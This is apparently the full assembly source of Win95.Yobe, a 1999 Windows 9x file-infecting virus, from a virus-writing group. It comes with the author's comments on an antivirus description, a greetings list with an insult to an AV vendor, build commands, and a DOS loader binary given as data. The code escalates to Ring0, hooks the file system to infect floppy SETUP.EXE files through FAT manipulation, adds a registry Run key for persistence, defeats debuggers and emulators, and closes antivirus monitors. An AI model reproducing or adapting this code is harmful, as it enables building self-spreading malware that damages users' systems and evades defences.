;Known bugs
;???????????
;
;My computer will sometimes hang while system will try to read infected file.
;Maybe old FD drive, maybe some bugz in virus code. This appear only on my
;computer, so I hope it is error on my side.
;
;
;
;AVP's description
;??????????????????
;
;Benny's notes: This is much better description than at BeGemot virus. However,
;I would have some notes, see [* *] marx:
;
;
;Win95.Yobe [* Fully compatible with Win98, so why Win95? *]
;
;This is a dangerous [* why dangerous?! *] memory resident parasitic Windows
;virus. It uses system calls that are valid under Win95/98 only and can't spread
;under NT. The virus also has bugs and often halts the system when run [* when,
;where, why? *]. Despite on this the virus has very unusual way of spreading,
;and it is interesting enough from technical point of view [* I hope it is *].
;The virus can be found only in two files: "SETUP.EXE" on floppy disks and
;"SETUP .EXE" in the root of the C: drive (there is one space between file name
;and ".EXE" extension).
;
;On the floppy disks the virus uses a trick to hide its copy. It writes its
;complete code to the last disk sectors and modifies the SETUP.EXE file to read
;and execute this code.
;
;The infected SETUP.EXE file looks just as 512 bytes DOS EXE program, but it is
;not. While infecting this file the virus uses "DirII" virus method: by direct
;disk sectors read/write calls the virus gets access to disk directory sectors,
;modifies "first file cluster" field and makes necessary changes in disk FAT
;tables. As a result the original SETUP.EXE code is not modified, but the
;directory entry points to virus code instead of original file clusters.
;
;When the infected SETUP.EXE is run from the affected floppy disk this DOS
;component of the virus takes control, reads the complete virus body from the
;last sectors on the floppy disk, then creates the "C:/SETUP .EXE" file, writes
;these data (complete virus code) to there and executes. The virus installation
;routine takes control then, installs the virus into the system and disinfect
;the SETUP.EXE file on the floppy drive.
;
;While installing itself into the system the virus creates [* opens *] the new
;key in the system registry to activate itself on each Windows restart:
;
; HKLM/Software/Microsoft/Windows/CurrentVersion/Run
; YOBE=""C:/SETUP .EXE" YOBE"
;
;The virus then switches to the Windows kernel level (Ring0), allocates a block
;of system memory, copies itself to there and hooks disk file access Windows
;functions (IFS API). This hook intercepts file opening calls and on opening
;the SETUP.EXE file on the A: drive the virus infects it.
;
;The virus has additional routines. First of them looks for "AVP Monitor" and
;"Amon Antivirus Monitor" windows and closes them; the second one depending on
;random counter displays the line with the words "YOBE" to the left side of the
;screen [* this is usually called as payload :D *].
;
;
;
;Greetz
;???????
;
; B0z0 - Huh, guy, why don't u stay in VX and write
; another Padania virus? Just last one ;))
; Billy Belcebu - Come to .cz! :D
; BitAddict - Nice to met ya. Kewl to met old TriDenTer.
; Darkman - Thank u for that wonderful book. It really
; r0x0r!!!
; Eddow - Would like to meet ya on IRC!
; GriYo - Hey man, just reply me once.
; Itchi - Drink, smoke and fuck again! :) Be back and
; learn to code, pal!
; Kaspersky - U cocksucker, where did u lose the description
; of BeGemot?!!
; Reptile - Smoke, smoke, smoke. This virus is really
; st0ned :D. Btw, still working on macro stuph? ;)
; StarZer0 - Bak infectorz aren't problem :D. Now, when I
; finished FAT12 inf., I will try to code
; multithreaded .txt infector ;)))
; - Fibers r cool, but threads rulez!!!
; The_Might -/
; MidNyte - > F0rk me a joint pleeeeeeaaazzzzz! :D
; Rhape97 -/
; All-nonsmokerz - Why do u drink and drive, when u can smoke
; and fly? X-DDD
; W33D - Thanx for inspiration, this virus is yourz,
; hehe :D.
; iKX stuph - Great work, men!!! XiNE#4 r0x0r!
;
;
;
;How to build
;?????????????
;
;brcc32 yobe.rc
;tasm32 -ml -q -m9 yobe.asm
;tlink32 -Tpe -c -x -aa yobe,,, import32,,yobe.res
;pewrsec yobe.exe
;
;
;
;Who is YOBE?
;???????????????????????????
;
;Many ppl will now laugh me (hi Darkman!, hi Billy!) :DD. Yobe was human, which
;role is situated in Bible. Nah, don't beat me, I'm not catholic. I only like
;stories and ppl in Bible. Yobe was human, which lost his religion. Ehrm,
;let's imagine it as "he stopped believing in what he believed". Story is all
;about that u shouldn't stop believe in what u believe. If u believe in better
;world, don't stop believing in it and do everything to become it truth, don't
;resignate. This ain't only about catholisism, it's about life and utophy.
;But NOW pick up your lazy ass and do anything, anything u think it's right,
;otherwise u won't get what u want!
;
;
;
;(c) 1999 Benny/29A. Enjoy!
.386p ;386 protected opcodez
.model flat ;flat model, 32bit offset
include win32api.inc ;include some structures
PC_WRITEABLE equ 00020000h ;equates used
PC_USER equ 00040000h ;in installation
PR_SHARED equ 80060000h ;stage
PC_PRESENT equ 80000000h
PC_FIXED equ 00000008h
PD_ZEROINIT equ 00000001h
IFSMgr_GetHeap equ 0040000Dh ;used services
IFSMgr_Ring0_FileIO equ 00400032h
IFSMgr_InstallFileSystemApiHook equ 00400067h
UniToBCSPath equ 00400041h
VMMCreateThread equ 00010105h
VMMTerminateThread equ 00010107h
_VWIN32_CreateRing0Thread equ 002A0013h
IFSMgr_Ring0_FileIO equ 00400032h
mem_size equ (virus_end-Start+0fffh+24576)/1000h
;size of virus in memory
VxDCall macro VxDService ;macro to call VxDCall
int 20h
dd VxDService
endm
extrn CreateFileA:PROC ;import APIz used by virus
extrn DeviceIoControl:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleFileNameA:PROC
extrn ReadFile:PROC
extrn CreateProcessA:PROC
extrn CopyFileA:PROC
extrn WaitForSingleObject:PROC
extrn DeleteFileA:PROC
extrn CreateThread:PROC
extrn GetCommandLineA:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn LoadIconA:PROC
extrn GetDC:PROC
extrn DrawIcon:PROC
extrn IsDebuggerPresent:PROC
extrn FindWindowA:PROC
extrn PostMessageA:PROC
.data ;data section
VxDName db '//./vwin32',0 ;vwin32 driver name
srcFile db 'a:/setup.exe',0 ;virus locations
dstFile db 'c:/setup.exe',0 ;on disk
regFile db '"C:/SETUP .EXE" ' ;in registry
regVal db 'YOBE',0
regSize = $-regFile
subKey db 'Software/Microsoft/Windows/CurrentVersion/Run',0
sICE db '//./SICE',0 ;SoftICE driver name
ShItTyMoNs: ;monitors to kill
db 'AVP Monitor',0
db 'Amon Antivirus Monitor',0
lpsiStartInfo db 64 ;used by CreateProcessA
db 63 dup (?)
regCont: ;registers passed to API
regEBX dd offset ROOT
regEDX dd 19
regECX dd 14
regEAX dd ?
regEDI dd ?
regESI dd ?
regFLGS dd ?
tmp dd ? ;variable requiered by API
org tmp
hKey dd ? ;key to registry
lppiProcInfo:
hProcess dd ? ;handle to new process
hThread dd ? ;handle to new thread
dwProcessID dd ? ;ID of process
dwThreadID dd ? ;ID of thread
vbuffer db 24576 dup (?) ;buffer filled with virus file
org vbuffer
fname db 256 dup (?) ;name of virus file
ends ;end of data section
.code ;code section
Start: ;virus body starts here
@SEH_SetupFrame ;setup SEH frame
mov esi, offset _crc_ ;start of block
mov edi, crc_end-_crc_ ;size of block
call CRC32 ;check code integrity
cmp eax, 0DACA92DCh ;CRC32 match?
_crc_=$
jne r_exit ;no, quit (anti-breakpoint)
call IsDebuggerPresent ;check if any application level
test eax, eax ;based debugger is present
jne exit ;yeah, quit - anti-debugger
mov [eax], ebx ;cause stack overflow exception
jmp r_exit ;- anti-emulator
seh_jmp:@SEH_RemoveFrame ;reset SEH handler
@SEH_SetupFrame ;...
mov eax, cs ;load CS selector
xor al, al ;only LSB is set under WinNT
test eax, eax ;is WinNT active
je r_exit ;yeah, quit
db 0d6h ;anti-emulator
mov eax, esp ;save ESP to EAX
push cs ;save CS to stack
pop ebx ;get it back to EBX
cmp esp, eax ;match?
jne r_exit ;no, quit - anti-emulator
mov eax, fs:[20h] ;get debugger context
test eax, eax ;is there any?
jne exit ;yeah, quit - anti-debugger
mov esi, offset ShItTyMoNs ;pointer to stringz
xor edi, edi ;to AV monitors
push 2 ;2 monitors
pop ecx ;...
KiLlMoNs:
push ecx ;save counter
push esi ;AV string
push edi ;NULL
call FindWindowA ;find window
test eax, eax ;found?
je next_mon ;no, try to kill other monitor
push edi ;now we will send message
push edi ;to AV window to kill itself
push 12h ;veeeeeeery stupid X-DD
push eax
call PostMessageA ;bye bye, hahaha
next_mon:
sub esi, -0ch ;next monitor string
pop ecx ;restore counter
loop KiLlMoNs ;kill another one, if present
push cs ;store CS
push offset anti_l ;store offset to code
retf ;go there - anti-emulator
CRC32: push ebx ;I found this code in Int13h's
xor ecx, ecx ;tutorial about infectin'
dec ecx ;archives. Int13h found this
mov edx, ecx ;code in Vecna's Inca virus.
NextByteCRC: ;So, thank ya guys...
xor eax, eax ;Ehrm, this is very fast
xor ebx, ebx ;procedure to code CRC32 at
lodsb ;runtime, no need to use big
xor al, cl ;tables.
mov cl, ch
mov ch, dl
mov dl, dh
mov dh, 8
NextBitCRC:
shr bx, 1
rcr ax, 1
jnc NoCRC
xor ax, 08320h
xor bx, 0edb8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx, eax
xor edx, ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax, edx
rol eax, 16
mov ax, cx
ret
anti_l: mov edi, offset sICE ;pointer to SoftICE
call OpenDriver ;try to open its driver
jne exit ;SICE present, quit - anti-debugger
mov esi, offset fname ;where to store virus filename
push 256 ;size of filename
push esi ;ptr to filename
push 400000h ;base address of virus
call GetModuleFileNameA ;get virus filename
test eax, eax ;error?
je exit ;yeah, quit
xor eax, eax
push eax
push eax
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
inc eax
ror eax, 1
push eax
push esi
call CreateFileA ;open virus file
inc eax ;error?
je exit ;yeah, quit
dec eax
xchg eax, esi
push 0
push offset tmp
push 24576 ;size of virus file
push offset vbuffer ;ptr to buffer
push esi
call ReadFile ;copy virus file to buffer
push eax
push esi
call CloseHandle ;and close virus file
pop ecx
jecxz exit
xor eax, eax
push offset tmp
push eax
push eax
push offset NewThread
push eax
push eax ;create new thread and let virus
call CreateThread ;code continue there
test eax, eax ;error?
je exit ;yeah, quit
mov word ptr [t_patch], 9090h ;allow execution of code -
push eax ; - anti-emulator
call CloseHandle ;close handle of thread
crc_end=$
e_patch:jmp $ ;this will be patched by thread
; - anti-emulator
exit: call GetCommandLineA ;get command-line
xchg eax, esi ;to esi
lodsb ;load byte
cmp al, '"' ;is it " ? If not, virus filename
jne regSet ;ain't long one - anti-AVer
lchar: lodsb ;load next byte
cmp al, '"' ;is it " ?
jne lchar ;no, continue
_lchar: lodsb ;load byte
cmp al, ' ' ;is it space?
je _lchar ;yeah, continue
test al, al ;is there any parameter?
jne regSet ;yeah, virus is loaded from
;C: drive -> no jump to host
mov edi, offset VxDName ;pointer to vwin32
call OpenDriver ;open driver
je regSet ;if error, quit
dec eax
mov [d_handle], eax ;store handle
mov eax, offset ROOT ;buffer for reading ROOT
push eax ;save ptr
call I25hSimple ;read ROOT
pop ebp ;get it back
jc c_exit ;if error, then quit
_f_cmp: mov esi, ebp ;get ptr to ROOT
push esi
lodsd
test eax, eax ;ZERO?
pop esi
je c_exit ;yeah, no more filez, quit
push 11 ;size of filename (8+3)
pop edi ;to EDI
call CRC32 ;calculate CRC32
cmp eax, 873F6A26h ;match?
je _fn_ok ;yeah, try to restore file
sub ebp, -20h ;no, get next directory record
jmp _f_cmp ;and try again
_fn_ok: mov edi, offset save ;load SAVE area sector from disk
mov [regEBX], edi
mov [regEDX], 2880-1 ;SAVE area = last sector in disk
mov [regECX], 1 ;one sector to read
call I25h ;read it
jc c_exit ;if error, then quit
push word ptr [ebp+1ah] ;store cluster_ptr
push dword ptr [ebp+1ch] ;store filesize
push word ptr [edi] ;restore cluster_ptr
pop word ptr [ebp+1ah] ;...
push dword ptr [edi+2] ;restore filesize
pop dword ptr [ebp+1ch] ;...
call WriteROOT ;restore directory record
pop dword ptr [ebp+1ch] ;restore filesize
pop word ptr [ebp+1ah] ;restore cluster_ptr
jc c_exit ;if error, then quit
mov ebx, offset dstFile ;destination path+filename
push 0
push ebx
push offset srcFile ;source path+filename
call CopyFileA ;copy virus from A: to C: drive
xchg eax, ecx ;error?
jecxz err_cpa ;yeah, quit
xor eax, eax
push offset lppiProcInfo
push offset lpsiStartInfo
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push ebx
call CreateProcessA ;execute original file (host)
xchg eax, ecx ;error?
jecxz err_cpa ;yeah, quit
mov ebp, [hProcess] ;get handle of host process
push -1 ;wait for its signalisation
push ebp ;...
call WaitForSingleObject ;...
push ebp
call CloseHandle ;close handle of host process
push dword ptr [hThread]
call CloseHandle ;close handle of host thread
err_cpa:call WriteROOT ;restore ROOT
push ebx
call DeleteFileA ;and delete host from C: drive
c_exit: push 12345678h ;get handle of vwin32 driver
d_handle = dword ptr $-4
call CloseHandle ;and close it
regSet: push offset tmp
push offset hKey
push 0
push 3
push 0
push 0
push 0
push offset subKey
push 80000002h
call RegCreateKeyExA ;open registry
test eax, eax
jne r_exit
push regSize
push offset regFile
push 1
push 0
push offset regVal
mov ebx, dword ptr [hKey]
push ebx ;set key - virus will be executed
call RegSetValueExA ;everytime Windows will start
push ebx
call RegCloseKey ;close registry
dw 310fh ;RDTCS
cmp al, 'Y' ;1:255 possibility
jne r_exit ;payload won't be activated
payload:push 0 ;payload will be activated
call GetDC ;get device context of desktop
xchg eax, ebx ;save HDC to EBX
push 29ah ;ID of icon
push 400000h ;base of virus
call LoadIconA ;load icon
xor edx, edx ;EDX=0
l_payload:
pushad ;store all registers
push eax ;icon handle
push edx ;Y possition
push 0 ;X possition
push ebx ;device context handle
call DrawIcon ;draw icon on desktop
popad ;restore all registers
sub edx, -30 ;increment Y possition
loop l_payload ;long payload :)
r_exit: @SEH_RemoveFrame ;remove SEH frame
push 0
call ExitProcess ;and exit
NewThread:
pushad ;store all registers
t_patch:jmp $ ;will be patched - anti-emulator
call EnterRing0 ;jmp to Ring-0
pushad ;store all registers
mov eax, dr0 ;get debug register
cmp eax, 'YOBE' ;check if we r already resident
je quitR0 ;yeah, quit
push 24576
VxDCall IFSMgr_GetHeap ;alocate memory for our virus
pop edx ;correct stack
xchg eax, edi ;get address to EDI
test edi, edi ;error?
je quitR0 ;yeah, quit
push edi ;copy virus file to memory
mov esi, offset vbuffer ;from
mov ecx, 24576/4 ;how many
rep movsd ;move!
pop ebp
mov [ebp + 600h+membase-Start], ebp ;save address
lea eax, [ebp + 600h+NewIFSHandler-Start]
push eax ;pointer to new handler
VxDCall IFSMgr_InstallFileSystemApiHook ;install file system hook
pop edx ;correct stack
mov [ebp + 600h+OldIFSHandler-Start], eax
mov eax, 'YOBE' ;mark debug register as "already
mov dr0, eax ;resident flag" - anti-debugger
quitR0: mov dword ptr [p_jmp], 90909090h ;patch code - anti-emulator
popad ;restore all registers
iretd ;and quit from Ring-0
EnterRing0: ;Ring0 port
pop eax ;get address
pushad ;store registers
sidt fword ptr [esp-2] ;load 6byte long IDT address
popad ;restore registers
sub edi, -(8*3) ;move to int3
push dword ptr [edi] ;save original IDT
stosw ;modify IDT
inc edi ;move by 2
inc edi ;...
push dword ptr [edi] ;save original IDT
push edi ;save pointer
mov ah, 0eeh ;IDT FLAGs
stosd ;save it
push ds ;save some selectors
push es ;...
int 3 ;JuMpToRiNg0!
pop es ;restore selectors
pop ds ;...
pop edi ;restore ptr
add edi, -4 ;move with ptr
pop dword ptr [edi+4] ;and restore IDT
pop dword ptr [edi] ;...
p_jmp: inc eax ;some silly loop to fool
cdq ;some AVs. Will be overwritten
jmp p_jmp ;with NOPs l8r by int handler
mov word ptr [e_patch], 9090h ;again, new overwriting of code
popad ; - anti-emulator
ret ;restore all registers and quit
OpenDriver:
xor eax, eax
push eax
push 4000000h
push eax
push eax
push eax
push eax
push edi
call CreateFileA ;open driver
inc eax ;increment handle
ret ;quit
NewIFSHandler: ;file system handler
enter 20h, 0 ;reserve space in stack
push dword ptr [ebp+1ch] ;for parameters
push dword ptr [ebp+18h]
push dword ptr [ebp+14h] ;store parameters
push dword ptr [ebp+10h] ;for next handler
push dword ptr [ebp+0ch]
push dword ptr [ebp+08h]
cmp dword ptr [ebp+0ch], 24h ;open?
jne quitHandler ;no, quit
pushad ;store all registers
call gdlta ;get delta offset
gdelta: db 0b8h ;prefix - anti-disassembler
gdlta: pop ebx ;and anti-lamer
xor ecx, ecx ;ECX=0
mov cl, 1 ;ECX=0 or 1
semaphore = byte ptr $-1
jecxz exitHandler ;semaphore set? then quit
mov byte ptr [ebx + semaphore - gdelta], 0
;set semaphore
lea edi, [ebx + filename - gdelta] ;get filename
mov al, [ebp+10h] ;get disk no.
dec al ;is it A: ?
jne exitHandler ;no, quit
mov al, 'A' ;add A letter
stosb ;store it
mov al, ':' ;add : letter
stosb ;store it
wegotdrive:
xor eax, eax
push eax
inc ah
push eax
mov eax, [ebp+1ch]
mov eax, [eax+0ch]
sub eax, -4
push eax
push edi
VxDCall UniToBCSPath ;convert UNICOE filename to ANSI
sub esp, -10h ;correct shitty stack
mov byte ptr [edi+eax], 0 ;and terminate filename with /0
mov esi, edi
dec esi
dec esi
xchg eax, edi
inc edi
inc edi
inc edi
call CRC32 ;calculate CRC32 of filename
cmp eax, 0B4662AD0h ;is it "A:/SETUP.EXE,0" ?
je setup_exe ;yeah, continue
exitHandler:
mov byte ptr [ebx + semaphore - gdelta], 1 ;set semaphore
popad ;restore all registers
quitHandler:
mov eax, 12345678h
OldIFSHandler = dword ptr $-4
call [eax] ;jump to next handler
sub esp, -18h ;correct stack
leave
ret ;and quit
setup_exe:
mov ecx, 1000h ;thread stack
lea ebx, [ebx + Thread_Infect - gdelta] ;address of thread proc
xor esi, esi ;next crappy parameter
VxDCall _VWIN32_CreateRing0Thread ;create new Ring-0 thread
jmp exitHandler ;and quit
; - anti-everything
db 0b8h ;prefix - anti-disassembler
Thread_Infect: ;Ring-0 thread proc
pushad ;store all registers
jmp ti_next ;jump over
db 3 dup (?) ;leave code be overwritten
ti_next:call tigdelta ;get delta offset
ti_gdelta db 0b8h ;next prefix
tigdelta:
pop ebx
xor ecx, ecx
inc ecx
lea esi, [ebx + BOOT - ti_gdelta] ;read BOOT sector
call Int25h
jc exit_thread
cmp [ebx + BOOT+0bh - ti_gdelta], 01010200h ;check, if diskette is
jne exit_thread ;1,44MB, check FAT and
cmp word ptr [ebx + BOOT+0fh - ti_gdelta], 0200h;ROOT possition
jne exit_thread
push 9
pop ecx
cmp word ptr [ebx + BOOT+16h - ti_gdelta], cx ;...
jne exit_thread ;no, its not 1,44MB FD
lea esi, [ebx + FAT - ti_gdelta]
inc edx
call Int25h ;read FAT
cmp byte ptr [esi], 0f0h ;check if it is 1,44MB
jne exit_thread ;no, quit
lea edi, [ebx + FAT+4223 - ti_gdelta] ;check FAT, if last sectors r
mov ebp, edi ;free
xor eax, eax
sFAT: scasd
jne exit_thread ;no, quit
loop sFAT
mov edi, ebp ;now we will mark FAT, last
inc edi ;sectors will be marked as
mov eax, 0ff0ff00h ;RESERVED
push 73 ;coz we infect 12bit FAT, we
pop ecx ;use this loop to mark it so
markFAT:ror eax, 8
test al, al
je markFAT
stosb
loop markFAT
mov byte ptr [edi], 0fh ;mark end
call ROOTinit
call Int25h ;read ROOT
f_cmp: mov esi, ebp ;get ptr to ROOT
push esi
lodsd
test eax, eax ;ZERO?
pop esi
je exit_thread ;yeah, no more filez, quit
push 11
pop edi
call CRC32 ;calculate CRC32 of file
cmp eax, 873F6A26h ;is it SETUP.EXE?
je fn_ok ;yeah, continue
sub ebp, -20h ;no, process next directory rec.
jmp f_cmp ;...
fn_ok: mov ax, [ebp+1ah] ;save cluster_ptr
mov [ebx + save - ti_gdelta], ax
mov eax, [ebp+1ch] ;save filesize
mov [ebx + save+2 - ti_gdelta], eax
mov word ptr [ebp+1ah], 2800 ;new cluster_ptr
mov dword ptr [ebp+1ch], 512 ;new filesize
xor ecx, ecx
inc ecx
lea esi, [ebx + loader - ti_gdelta]
mov edx, 2880-49
call Int26h ;write DOS loader
push 42
pop ecx
mov esi, [ebx + membase - ti_gdelta]
mov edx, 2880-48 ;write virus
call Int26h
xor ecx, ecx
inc ecx
lea esi, [ebx + save - ti_gdelta]
mov edx, 2880-1
call Int26h ;write SAVE area
call ROOTinit
call Int26h ;write ROOT
push 9
pop ecx
lea esi, [ebx + FAT - ti_gdelta]
xor edx, edx
inc edx
pushad
call Int26h ;write first FAT
popad
sub dl, -9
call Int26h ;write second FAT
exit_thread:
popad ;restore all registers
ret ;and exit
ROOTinit: ;procedure to initialize
push 14 ;registers for reading/writing
pop ecx ;ROOT
push 19
pop edx
lea esi, [ebx + ROOT - ti_gdelta]
mov ebp, esi
ret
Int26h: mov eax, 0DE00h ;write sectors
jmp irfio
Int25h: mov eax, 0DD00h ;read sectors
irfio: VxDCall IFSMgr_Ring0_FileIO
ret
WriteROOT: ;code used to write sectorz
mov [regEBX], offset ROOT ;pointer to ROOT field
mov [regEDX], 19 ;sector number of ROOT
mov [regECX], 14 ;sectors to write
I26h: mov [p2526], 3 ;set WRITE mode
jmp i2526 ;continue
I25h: mov [p2526], 2 ;set READ mode
i2526: and [regEAX], 0 ;zero EAX
I25hSimple:
push 0
push offset tmp
push 28
push offset regCont
push 28
push offset regCont
push 2
p2526 = byte ptr $-1
push dword ptr [d_handle]
call DeviceIoControl ;backdoor used to call DOS services
xchg eax, ecx ;error?
jecxz q2526h ;yeah, set CF and quit
clc ;clear CF
ret ;quit
q2526h: stc ;set CF
ret ;and quit
loader: ;DOS loader
include loader.inc
ldrsize = $-loader ;size of DOS loader
membase dd 'YYYY' ;address, where is virus placed in memory
filename db 100h dup ('Y') ;filename
save db 512 dup ('Y') ;save area
BOOT db 512 dup ('Y') ;BOOT
FAT db 4608 dup ('Y') ;FAT
ROOT db 7168 dup ('Y') ;ROOT
virus_end: ;virus ends here
ends ;end of code section
End Start ;thats all f0lx ;)
?????????????????????????????????????????????????????????????????[yobe.asm]???
???????????????????????????????????????????????????????????????[LOADER.INC]???
dd 5A4Dh
dd 1
dd 5410010h
dd 0FFFFh
dd 0
dd 0
dd 1Ch
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 8EC0331Eh
dd 901EC4D8h
dd 1E892E00h
dd 8C2E008Dh
dd 0C7008F06h
dd 9B009006h
dd 920E8C00h
dd 1F0E0E00h
dd 2AB907h
dd 0BB0B10BAh
dd 25CD00CBh
dd 0B8587258h
dd 0DB33716Ch
dd 0BAC93343h
dd 9EBE0012h
dd 7221CD00h
dd 40B49346h
dd 0B900CBBAh
dd 21CD6000h
dd 3EB43972h
dd 2E0721CDh
dd 0BF068Ch
dd 48BB4AB4h
dd 1E21CD05h
dd 77168C06h
dd 7C268900h
dd 0B8070E00h
dd 0BBBB4B00h
dd 0ACBA00h
dd 34B821CDh
dd 0BCD08E12h
dd 1F071234h
dd 0ACBA41B4h
dd 3321CD00h
dd 66D88EC0h
dd 34567868h
dd 68F6612h
dd 0B80090h
dd 0B021CD4Ch
dd 3A43CF03h
dd 5445535Ch
dd 2E205055h
dd 455845h
dd 535C3A43h
dd 50555445h
dd 452E317Eh
dd 4558h
dd 8100h
dd 0FFFFFF00h
dd 0FFFFFFFFh
dw 0EFFh
db 0
???????????????????????????????????????????????????????????????[LOADER.INC]???
4194
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
